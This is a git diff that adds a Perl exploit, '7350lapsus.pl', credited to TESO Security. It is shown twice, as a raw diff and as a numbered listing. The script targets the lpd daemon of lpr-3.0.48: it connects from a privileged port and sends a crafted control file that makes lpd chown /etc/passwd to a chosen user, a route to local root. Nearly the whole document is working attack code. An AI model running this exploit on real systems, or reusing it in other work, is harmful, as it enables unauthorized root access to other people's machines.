1 files changed, 65 insertions, 0 deletions
diff --git a/exploits/7350lapsus/7350lapsus.pl b/exploits/7350lapsus/7350lapsus.pl
new file mode 100644
index 0000000..cad1ae0
--- /dev/null
+++ b/exploits/7350lapsus/7350lapsus.pl
@@ -0,0 +1,65 @@
+#!/usr/bin/perl -w
+# 7350lapsus
+#
+# lpr-3.0.48 Local root exploit.
+# requires root on a host counted in
+# hosts.lpd and local account on lpd box.
+# This is proof of concept, chown()ing /etc/passwd
+# to a user named 'stealth'.
+#
+# (C) COPYRIGHT TESO Security, 2001
+# All Rights Reserved
+#
+# May be used under the terms of the GPL.
+#
+use IO::Socket;
+sub recvack 
+{
+        my $ack;
+        $_[0]->recv($ack, 1);
+        if ($ack ne "\0") {
+                print "Some ACK-error occured.\n";
+                exit;
+        }
+}
+$rem = shift; 
+if (!defined($rem)) {
+        print "$0 <hostname>\n"; exit;
+}
+# Open connection
+for ($i = 721; $i <= 731 && !defined $peer; ++$i) {
+        $peer = IO::Socket::INET->new(PeerAddr  => $rem,
+                              PeerPort  => 515,
+                              LocalPort => $i,
+                              Proto     => "tcp",
+                              Type      => SOCK_STREAM);
+}
+die "$!" if (!defined($peer));
+print "Bound to port $i\n";
+print $peer "\2lp\n";
+recvack($peer);
+$payload = "Pstealth\na/etc/passwd\n";
+$l = length($payload);
+# First bug in lpd: allows to create files in /
+# with length up to 5 chars
+print $peer "\x02$l /foo\n";
+recvack($peer);
+# This one is incredible. it trusts controlfiles
+# input to chown ANY file on system to user.
+print $peer $payload;
+print $peer "\0";
+recvack($peer);
+close $peer;

diff --git a/exploits/7350lapsus/7350lapsus.pl b/exploits/7350lapsus/7350lapsus.pl new file mode 100644 index 0000000..cad1ae0 --- /dev/null +++ b/exploits/7350lapsus/7350lapsus.pl
@@ -0,0 +1,65 @@
	1	#!/usr/bin/perl -w
	2
	3	# 7350lapsus
	4	#
	5	# lpr-3.0.48 Local root exploit.
	6	# requires root on a host counted in
	7	# hosts.lpd and local account on lpd box.
	8	# This is proof of concept, chown()ing /etc/passwd
	9	# to a user named 'stealth'.
	10	#
	11	# (C) COPYRIGHT TESO Security, 2001
	12	# All Rights Reserved
	13	#
	14	# May be used under the terms of the GPL.
	15	#
	16
	17	use IO::Socket;
	18
	19	sub recvack
	20	{
	21	my $ack;
	22	$_[0]->recv($ack, 1);
	23	if ($ack ne "\0") {
	24	print "Some ACK-error occured.\n";
	25	exit;
	26	}
	27	}
	28
	29	$rem = shift;
	30	if (!defined($rem)) {
	31	print "$0 <hostname>\n"; exit;
	32	}
	33
	34	# Open connection
	35	for ($i = 721; $i <= 731 && !defined $peer; ++$i) {
	36	$peer = IO::Socket::INET->new(PeerAddr => $rem,
	37	PeerPort => 515,
	38	LocalPort => $i,
	39	Proto => "tcp",
	40	Type => SOCK_STREAM);
	41	}
	42
	43	die "$!" if (!defined($peer));
	44
	45	print "Bound to port $i\n";
	46
	47	print $peer "\2lp\n";
	48	recvack($peer);
	49
	50	$payload = "Pstealth\na/etc/passwd\n";
	51	$l = length($payload);
	52
	53	# First bug in lpd: allows to create files in /
	54	# with length up to 5 chars
	55	print $peer "\x02$l /foo\n";
	56	recvack($peer);
	57
	58	# This one is incredible. it trusts controlfiles
	59	# input to chown ANY file on system to user.
	60	print $peer $payload;
	61	print $peer "\0";
	62	recvack($peer);
	63
	64	close $peer;
	65